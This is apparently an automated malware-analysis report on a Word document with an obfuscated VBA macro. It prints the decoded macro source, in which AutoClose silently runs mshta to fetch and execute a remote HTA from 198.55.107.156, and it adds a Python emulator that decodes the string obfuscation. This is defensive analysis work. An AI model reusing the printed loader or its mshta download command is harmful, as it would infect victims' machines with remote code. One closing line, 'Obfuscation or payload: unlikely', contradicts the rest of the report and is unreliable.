Verdict: MALICIOUS
Risk Score: 322

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)
The sample is a Word OOXML document (word/vbaProject.bin) carrying heavily obfuscated VBA. The entry point is `Sub AutoClose`, which Word runs when the document is closed and which does nothing but `Application.Run "fominha"`; firing on close rather than open is a common loader trick, since the decoy has already been displayed and the user is walking away. `fominha` builds its strings by salting them with random 12-character junk tokens and then stripping the tokens with a chain of `Replace()` calls, padded with dead arithmetic and unused string assignments. Working the chain through (MwYvLMGnrDcd -> m, VnAHriGfXVrQ -> a, QPiIViiTwjEO -> s, kruKnSxHEFyV -> t, CBGKocwOuACW -> e) gives the command line `mshta http://198.55.107.156/omm/stem.php?utma=honda`, and the second chain gives the ProgID `WScript.Shell`, so the sink that actually executes is `CreateObject("WScript.Shell").Run "mshta http://198.55.107.156/omm/stem.php?utma=honda", 0` (window style 0 = hidden). Download and execution are therefore proxied through mshta.exe, which fetches the HTA from 198.55.107.156 and runs whatever script it returns; the static sample says nothing about that second stage. The URL extractor only reports OOXML namespace URIs (see Embedded URL below), which is expected: the payload URL never appears in plain form in the macro source. ClamAV independently flags the file as Doc.Malware.Emooodldr-6711604-0.
Heuristics (7)

- ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0.
- VBA project inside OOXML [medium, OOXML_VBA, 4 related findings]: Document contains a VBA project (VBA macros present).
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: An auto-exec VBA routine reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the CreateObject/Shell/URL indicators out of the macro source as written, so plain-text signature matching on the source misses them.
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro present (here `Sub AutoClose`, which Word runs when the document is closed).
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call present.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where readable source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. All 15 URLs below were found in document text (OOXML body / shared strings) and are OOXML namespace identifiers, not network indicators; the loader's real URL only exists after the Replace chain runs:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2543 bytes | f290efbc56b555a7db591e411cf4821f61765270077273e4ad923c88ed220189 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub fominha()
BvizgwnFJEVL = 1025 - 1590 - 1635 - 526 - 1819 - 756 - 1765
yRpJONvq = Trim("p") & Trim("I") & "k"
WVLgBwJxEDk = 370 + 238 + 70
fkWiuqnMVjSz = 1215 + 673 + 137 + 1819 + 1867
oiVKZIzPndn = "N" & Trim("S") & "R"
cogumelo = "MwYvLMGnrDcdQPiIViiTwjEOhkruKnSxHEFyVVnAHriGfXVrQ hkruKnSxHEFyVkruKnSxHEFyVp://198.55.107.156/oMwYvLMGnrDcdMwYvLMGnrDcd/QPiIViiTwjEOkruKnSxHEFyVCBGKocwOuACWMwYvLMGnrDcd.php?ukruKnSxHEFyVMwYvLMGnrDcdVnAHriGfXVrQ=hondVnAHriGfXVrQ"
cogumelo = Replace(cogumelo, "MwYvLMGnrDcd", "m")
cogumelo = Replace(cogumelo, "VnAHriGfXVrQ", "a")
uPrnHBVNN = 1146 + 1067
cogumelo = Replace(cogumelo, "QPiIViiTwjEO", "s")
GfXuZGUWW = "w" & Trim("A")
pEfYMkCVMDBK = 1029 + 1651 + 643 + 1997 + 894 + 1199 + 969
cogumelo = Replace(cogumelo, "kruKnSxHEFyV", "t")
cogumelo = Replace(cogumelo, "CBGKocwOuACW", "e")
UHYdwIq = "d" & Trim("K") & Trim("Y")
iBAnroMgq = "Z" & "Q" & Trim("M")
cogumelo = Replace(cogumelo, "KySNYTJRAjKR", "l")
nirvana = "WScripLWrCpPbBzLwQ.ShXxIJQcGcbPYJRFyVPXiMOxOoRFyVPXiMOxOo"
nirvana = Replace(nirvana, "iJbwOEbXXDUY", "m")
nirvana = Replace(nirvana, "DuQkRQgnNogf", "a")
GFdjonOvvN = 1229 + 1997 + 767 + 1345
wdkWwVMogMdF = Trim("C") & Trim("o") & Trim("d")
WDuCSTJ = 519 - 1951 - 448 - 315 - 1544 - 1316 - 1496
nirvana = Replace(nirvana, "VfnwvorYrOGq", "s")
nirvana = Replace(nirvana, "LWrCpPbBzLwQ", "t")
nirvana = Replace(nirvana, "XxIJQcGcbPYJ", "e")
XooBBDiuw = "f" & "H" & Trim("D") & "A"
nirvana = Replace(nirvana, "RFyVPXiMOxOo", "l")
yBjcuoUUR = "i" & "c" & "q" & "M" & "i"
YFnIKVUDWo = 1743 + 996 + 1927 + 622 + 106 + 1839
CreateObject(nirvana).Run cogumelo, 0
YWBYKNnG = 1482 + 1928
iScvAfJ = "S" & "M" & "V"
iJWIpyRIvEo = 1085 + 821 + 1310 + 357
poSXLkHfzF = 1956 - 1587 - 1002 - 1256
UivKyIW = 1591 + 174 + 366 + 940 + 1106
End Sub
Sub AutoClose()
Xwzcvbkqgd = 1905 + 604 + 1197 + 113 + 469 + 1571 + 409
UArEdXocXAp = 1210 - 359
gRINSrwkzQH = Trim("R") & "T" & Trim("N") & Trim("i")
ZQQNViIRP = 1605 - 387 - 894 - 88
YiYrBorUWXo = 40 - 1342 - 1003 - 1795 - 930
Application.Run "fominha"
gAJMQHJn = 1568 + 1554 + 1690 + 1220
DQXDnWzd = 521 + 394 + 1937
PJqGHnKyW = "W" & "Z"
GxCxAKVQO = Trim("A") & Trim("Y")
End Sub
```
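Working the Replace chain by hand is error-prone, so the following is a small static emulator for the junk-token pattern that OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER flags, written for this report as an added example; it is not the analyzer's code and not part of oletools. It takes the relevant lines of macros.bas above (embedded inline, with the dead arithmetic left out), evaluates the `Replace()` and `&` statements, resolves what reaches `CreateObject(...).Run`, and lists the auto-exec entry points. The regexes cover only the statement shapes present in this sample, and anything they do not recognise is reported as unresolved rather than guessed.

```python
"""Static emulation of the junk-token Replace() chain in macros.bas.

Added example for this report, not code from the analyzer or from oletools.
It walks the VBA source line by line, evaluates the string assignments,
"&" concatenations and Replace() calls it recognises, and resolves the
variables that reach the CreateObject(...).Run sink.  Nothing from the
macro is executed and nothing is fetched from the network.
"""
import re

# Subset of the extracted macros.bas copied from the preview above.  The
# numeric junk and the Replace() calls whose token never occurs are dropped;
# they do not change the result.
MACRO_SRC = '''Sub fominha()
yRpJONvq = Trim("p") & Trim("I") & "k"
cogumelo = "MwYvLMGnrDcdQPiIViiTwjEOhkruKnSxHEFyVVnAHriGfXVrQ hkruKnSxHEFyVkruKnSxHEFyVp://198.55.107.156/oMwYvLMGnrDcdMwYvLMGnrDcd/QPiIViiTwjEOkruKnSxHEFyVCBGKocwOuACWMwYvLMGnrDcd.php?ukruKnSxHEFyVMwYvLMGnrDcdVnAHriGfXVrQ=hondVnAHriGfXVrQ"
cogumelo = Replace(cogumelo, "MwYvLMGnrDcd", "m")
cogumelo = Replace(cogumelo, "VnAHriGfXVrQ", "a")
cogumelo = Replace(cogumelo, "QPiIViiTwjEO", "s")
cogumelo = Replace(cogumelo, "kruKnSxHEFyV", "t")
cogumelo = Replace(cogumelo, "CBGKocwOuACW", "e")
nirvana = "WScripLWrCpPbBzLwQ.ShXxIJQcGcbPYJRFyVPXiMOxOoRFyVPXiMOxOo"
nirvana = Replace(nirvana, "LWrCpPbBzLwQ", "t")
nirvana = Replace(nirvana, "XxIJQcGcbPYJ", "e")
nirvana = Replace(nirvana, "RFyVPXiMOxOo", "l")
CreateObject(nirvana).Run cogumelo, 0
End Sub
Sub AutoClose()
Application.Run "fominha"
End Sub
'''

# Statement shapes we model.  VBA's doubled-quote escape ("") inside a
# literal is not handled; it does not occur in this sample.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
REPLACE_RE = re.compile(r'^Replace\(\s*(\w+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)$')
TERM = r'(?:Trim\(\s*"[^"]*"\s*\)|"[^"]*")'
CONCAT_RE = re.compile(r'^' + TERM + r'(?:\s*&\s*' + TERM + r')*$')
TERM_RE = re.compile(r'Trim\(\s*"([^"]*)"\s*\)|"([^"]*)"')
SINK_RE = re.compile(r'CreateObject\(\s*(\w+)\s*\)\.Run\s+(\w+)\s*,\s*(\d+)')
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(Auto_?(?:Open|Close|Exec|Exit|New)|Document_(?:Open|Close|New)'
    r'|Workbook_(?:Open|BeforeClose))\b', re.IGNORECASE | re.MULTILINE)
URL_RE = re.compile(r'https?://[^\s"\']+')


def eval_rhs(rhs, env):
    """Evaluate an assignment RHS if it is a shape we model, else None.

    The dead arithmetic and any call we do not emulate stay unassigned, so a
    sink that depends on them shows up as unresolved instead of as a guess.
    """
    m = REPLACE_RE.match(rhs)
    if m:
        src, find, repl = m.groups()
        if src not in env:
            return None
        # Replace() with no compare argument is case-sensitive and replaces
        # every occurrence, which is exactly str.replace().
        return env[src].replace(find, repl)
    if CONCAT_RE.match(rhs):
        # Trim("x") strips whitespace from the literal; "&" concatenates.
        return "".join(
            t.group(1).strip() if t.group(1) is not None else t.group(2)
            for t in TERM_RE.finditer(rhs))
    return None


def emulate(src):
    """Run the string-building statements; return (env, resolved sinks)."""
    env, sinks = {}, []
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            name, rhs = m.groups()
            val = eval_rhs(rhs, env)
            if val is not None:
                env[name] = val
            continue
        s = SINK_RE.search(line)
        if s:
            obj_var, cmd_var, style = s.groups()
            sinks.append({
                "progid": env.get(obj_var, f"<unresolved {obj_var}>"),
                "command": env.get(cmd_var, f"<unresolved {cmd_var}>"),
                "window_style": int(style),  # WScript.Shell.Run: 0 = hidden
            })
    return env, sinks


def find_autoexec(src):
    """Names of the Office auto-execution entry points defined in src."""
    return AUTOEXEC_RE.findall(src)


def extract_iocs(src=MACRO_SRC):
    env, sinks = emulate(src)
    urls = sorted({u for v in env.values() for u in URL_RE.findall(v)})
    return {"entry_points": find_autoexec(src), "sinks": sinks,
            "urls": urls, "strings": env}


if __name__ == "__main__":
    report = extract_iocs()
    print("auto-exec entry points:", report["entry_points"])
    for s in report["sinks"]:
        print(f'CreateObject("{s["progid"]}").Run "{s["command"]}", '
              f'{s["window_style"]}')
    print("URLs:", report["urls"])
```

Run as-is it prints the resolved sink, `CreateObject("WScript.Shell").Run "mshta http://198.55.107.156/omm/stem.php?utma=honda", 0`, plus the entry point `AutoClose` and the one real URL. Passing the full macros.bas text to `extract_iocs()` gives the same answer, since the arithmetic lines are skipped. The unresolved path is the part worth keeping: if a later variant builds its string with a `Chr()` loop or a hex decoder the emulator does not model, the sink is still listed with `<unresolved ...>` so you know to fall back to dynamic analysis instead of trusting a partial decode.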
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes | a15c453d2e422cd837a18ea051e457b3cd58e6808d0dcfebc78def3ae71c547d |

Detection for vbaProject_00.bin: ClamAV Doc.Malware.Emooodldr-6711604-0. Obfuscation or payload: unlikely.